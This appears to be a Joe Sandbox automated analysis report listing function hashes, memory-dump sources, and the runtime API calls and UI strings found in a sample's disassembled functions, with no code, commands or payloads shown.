                                                                                                                                                                                                      • Instruction ID: 487aa8d31abbf8e5e5f45f448f636a941bb5b9a8b27695c93cb54bb72a54c025
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7835d36624c6e4837c03091a680af5c084d6deef8ca5dd22d6340a9da368d8e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A722A332A08695C5E721CB3694411FEBB60FF5D398F149339EA58A76B9EF38A444CF40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4981F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49834C
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4981F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B498379
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4981F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983A0
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4981F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983C3
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ACC7
                                                                                                                                                                                                        • Part of subcall function 00007FF68B499C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499CFA
                                                                                                                                                                                                        • Part of subcall function 00007FF68B499250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499352
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49AC8B
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ACA6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free$ceilffloorfmalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 573317343-0
                                                                                                                                                                                                      • Opcode ID: 7a29dc14ebe9a29ac3c6486ad4e6fc0386cc38f741e23540c2c35460d7584c42
                                                                                                                                                                                                      • Instruction ID: d16b6f2b660671d1a554fe51dc7c65e2362cdb7ce7707790c6da842579426566
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a29dc14ebe9a29ac3c6486ad4e6fc0386cc38f741e23540c2c35460d7584c42
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA12A032A18B94CAE311CB3595416BD77B4FF5D744F15832AEE88A3669EF38E491CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: 6e0e5c095aae63478f4a1cf7ab335ddc02efa7da69751c8db52d8338c377c1d1
                                                                                                                                                                                                      • Instruction ID: 874566ab943130d914a2a0b4aa7b684fb23f80ee3c1e6b23de286810802c4755
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e0e5c095aae63478f4a1cf7ab335ddc02efa7da69751c8db52d8338c377c1d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A41F811E18B8D82E812867600039BDC5417F6E7C6E599B35EA4FB37BBEF2971D2C600
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #SCROLLX$#SCROLLY
                                                                                                                                                                                                      • API String ID: 0-350977493
                                                                                                                                                                                                      • Opcode ID: 3f79e68f919ed87ebcc83bb1a63c1ce2b24f9297621096451a16576b666a81a2
                                                                                                                                                                                                      • Instruction ID: c607242d1d0f766539ac9533263f6ec77f4a37caec00dfcb5c5134b21036eefb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f79e68f919ed87ebcc83bb1a63c1ce2b24f9297621096451a16576b666a81a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D012A422D18BC9C5E212CA3791421B9B750EF7E385F28EB26FA45765B6DF25B0D1CB00
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF68B4A0BDD
                                                                                                                                                                                                      • ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF68B4A0BFC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
                                                                                                                                                                                                      • API String ID: 0-4293514333
                                                                                                                                                                                                      • Opcode ID: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
                                                                                                                                                                                                      • Instruction ID: e045ce706509468f33373a2e1bdec36c9b8bed3c25b5a3f7c29f2683fdd9bf50
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D11A23B046D489D755CF2AD8C5A7D7B9AEB98B02B4AC176CE49C23A1EF7AC445C310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: [ ]$[x]
                                                                                                                                                                                                      • API String ID: 0-3323218928
                                                                                                                                                                                                      • Opcode ID: b8b6148c93a4117ed861a16286f5e52501efab6a4ffa86e6567521de6220ef5c
                                                                                                                                                                                                      • Instruction ID: de3e197e63d261355b9c47261962741c3c1cbf457ddb0feccff668e79dfb86f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8b6148c93a4117ed861a16286f5e52501efab6a4ffa86e6567521de6220ef5c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE1A832918B9985E212DB3694421B9B350FF6E384F089736FE58675BADF39B581CB00
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: VUUU$VUUU
                                                                                                                                                                                                      • API String ID: 0-3149182767
                                                                                                                                                                                                      • Opcode ID: fe7a045e21d44c4598186552919033e1af5d53331879a7ea859925f5f30868b5
                                                                                                                                                                                                      • Instruction ID: f4844d812ae43756b478eeb4f09944b60769b16678969d830587b18cf442dfba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe7a045e21d44c4598186552919033e1af5d53331879a7ea859925f5f30868b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C1B733E10B48D9E301CB3A94425E97361FF6E7887159326FA0CB7A75DF24A191DB80
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                      • Opcode ID: c47dca8d5b182fba02c881052b1c4aa2ec2de0ad7f0ca7ea4cedb00b32109449
                                                                                                                                                                                                      • Instruction ID: 9c3e1e3ffdae1120c871c4a8e7983d61d5dfa05635179517d253c05dda6ad6f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c47dca8d5b182fba02c881052b1c4aa2ec2de0ad7f0ca7ea4cedb00b32109449
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F91F632A1968586DB22CB3A91017B97760FF9D785F14C735DE49A36B9EF38E085C700
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: ##Combo_%02d
                                                                                                                                                                                                      • API String ID: 0-4250768120
                                                                                                                                                                                                      • Opcode ID: 9f5351e70d1de63f89b5337344dd6f688a1bacaad70dfebaa2326098bd8676dc
                                                                                                                                                                                                      • Instruction ID: 67f9ca096d5f96872f029bae95cee99710bf63c1f41fb9da7f25628861126c12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f5351e70d1de63f89b5337344dd6f688a1bacaad70dfebaa2326098bd8676dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B42C432918B85C6E711CB3690411E9B7A0FF9E784F189339EA58676B9DF38E095DF00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                      • Opcode ID: 886b7c529aa525b92c5d7cd564e91f9634371dc575010af2bb50e571d960faf0
                                                                                                                                                                                                      • Instruction ID: 1b494d5092706791167bd1de3b8e151ae3c0d363b659438032fd42351b8c88e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886b7c529aa525b92c5d7cd564e91f9634371dc575010af2bb50e571d960faf0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B424976A04A85C6E710CF2AE4846A977B0FF88B84F158236DE4D97B35DF7AE445CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                      • Opcode ID: 2779aa3f8a18e0d44126db722120bf6fa7bbd2995af281905c50f4ca5d2adebe
                                                                                                                                                                                                      • Instruction ID: 9f0fb8843c21f5b896e4c7d8ecb97ac08b18118deb30fad973986106dd2f4fda
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2779aa3f8a18e0d44126db722120bf6fa7bbd2995af281905c50f4ca5d2adebe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2610B6371C5E282D3554B2C955217D6ED0FB9D348F1C9238EA8AC3B69CD7CD505CB40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                      • Opcode ID: b6af1a383d681b7933cc94b366759698e1443541f08d1f7f5591f49409593370
                                                                                                                                                                                                      • Instruction ID: 2a3b8bba770674a25ce610c25d196354e966185cf63ad228a9bb04f75569d594
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6af1a383d681b7933cc94b366759698e1443541f08d1f7f5591f49409593370
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D610673B1C6E1C6D7158B38A506A79AED4FB8D308F098279DA8CC3B69DE6ED101C700
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 9af0f0eee506a311e96cd7d078d4f3325ebeeb9be1acb98b117b9a3c10b2db2e
                                                                                                                                                                                                      • Instruction ID: 69487d071b0c69f6bc14686f7ba4251566adcf19143b8a32add119c3a31fa5f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9af0f0eee506a311e96cd7d078d4f3325ebeeb9be1acb98b117b9a3c10b2db2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CB26432D58689C6E7569E3680412F97790FF6DB48F1C8B39DE086B1B9EF386580CB50
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: f37f7ce08d8c6b45e08b44b6dc8ba8b9d157a5bb2e7a3b41741c309ca2678d9e
                                                                                                                                                                                                      • Instruction ID: d2f46e448bae08916825ea5e0d0959cbbce7f321df38af69e4eec6049d7e6403
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f37f7ce08d8c6b45e08b44b6dc8ba8b9d157a5bb2e7a3b41741c309ca2678d9e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A122D632A08685D5E7569E3682432BA7790FF1DB84F088739DE0EA77BDDF28A454C710
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: df7c3698255ae9fdd1a18b4ba295e0856d580ef0f19a8ea56040b0a227850642
                                                                                                                                                                                                      • Instruction ID: f68a1884c5a55954b166dad2621af49bba024da40758afed639a8c1a293f8cfc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df7c3698255ae9fdd1a18b4ba295e0856d580ef0f19a8ea56040b0a227850642
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99F1D523D28B8D85E212963755430B9B350BFBF3C4F1DEB26FD44B65B6DF2861919600
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
